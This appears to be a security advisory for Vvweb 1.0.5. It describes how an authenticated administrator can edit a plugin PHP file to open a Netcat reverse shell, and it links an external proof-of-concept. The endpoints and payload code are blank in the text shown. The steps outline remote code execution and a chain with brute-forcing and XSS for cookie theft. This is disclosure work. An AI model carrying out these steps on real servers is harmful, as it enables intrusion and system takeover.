Key Information Details Software Type: Web App Software Name: Vvweb Affected Version: 1.0.5 Software Vendor: Vvweb Software Link: https://github.com/givanz/Vvweb Severity: Critical CVSS Score: 9.1 CVE Link: Pending Affected Assets: 163+ Discovery Date: January 3, 2025 PoC Exploit: https://gist.github.com/OxHamy/f16fb399f8dd3a973acadc18fa07b1cb Description Administrators can access and modify plugin code without any validation mechanism to prevent malicious code execution. An authenticated administrator can modify plugins via the endpoint: . Through this endpoint, the PHP file (theme.php) can be modified to gain shell access to the web server. Reproduction Steps 1. Access the following endpoint: 2. Locate and edit , replacing its content with the following code: 3. Replace the IP and port in your listener (e.g., Netcat). 4. Save the PHP file and execute it by opening: 5. Monitor your Netcat listener to receive a reverse shell connection. Individually, this vulnerability may not cause immediate impact, but when combined with password brute-forcing and XSS on the admin panel, it can lead to cookie theft and full compromise of the system. Proof-of-Concept (PoC) Video A PoC video is provided, demonstrating the exploitation process.